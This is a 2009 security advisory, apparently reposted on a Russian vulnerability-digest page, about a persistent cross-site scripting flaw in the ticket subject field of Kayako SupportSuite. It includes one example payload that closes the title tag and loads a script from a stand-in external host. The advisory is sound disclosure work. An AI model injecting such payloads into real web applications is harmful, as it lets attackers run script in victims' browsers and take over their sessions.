Дополнительная информация

Ежедневная сводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

[NGENUITY] - Spiceworks Multiple Vulnerabilities (XSS & CSRF)

[RT-SA-2009-005] Papoo CMS: Authenticated Arbitrary Code Execution

XSS in SqLiteManager

Vulnerability in Dumb math captcha for WordPress

From:	Adam Baldwin <adam_baldwin_(at)_ngenuity-is.com>
Date:	10 августа 2009 г.
Subject:	[NGENUITY] - Ticket Subject Persistent XSS in Kayako SupportSuite

nGenuity Information Services – Security Advisory

  Advisory ID: NGENUITY-2009-008 - Ticket Subject Persistent XSS in
Kayako SupportSuite
  Application: SupportSuite v3.50.06
       Vendor: Kayako
Vendor website: http://www.kayako.com
       Author: Adam Baldwin (adam_baldwin@ngenuity-is.com)

        Class: Persistent Cross-Site Scripting

 I. BACKGROUND
    "SupportSuite is [Kayako's] flagship product, integrating the
ticket and
     e-mail management features of eSupport with the live chat and visitor
     monitoring features of LiveResponse." [1]

II. DETAILS
    The subject field of a newly created support ticket is not properly
encoded before
    being sent to the browser when the ticket details are viewed. More
information
    on cross-site scripting please refer to the Common Weakness
Enumeration specification
    available cwe.mitre.org [2].

    An example attack might look similar to the following.

    </title><script src="example.com/attack.js"></script>

III. REFERENCES
    [1] - http://www.kayako.com
    [2] - http://cwe.mitre.org/data/definitions/79.html

IV. VENDOR COMMUNICATION
    7.17.2009 - Vulnerability Discovery
    7.20.2009 - Initial Vendor Response
    7.21.2009 - Patch created, Will be pushed to next stable release
    8.08.2009 - Advisory released

http://www.ngenuity.org/wordpress/2009/08/08/ngenuity-ticket-subject-persistent-x
ss-in-kayako-supportsuite/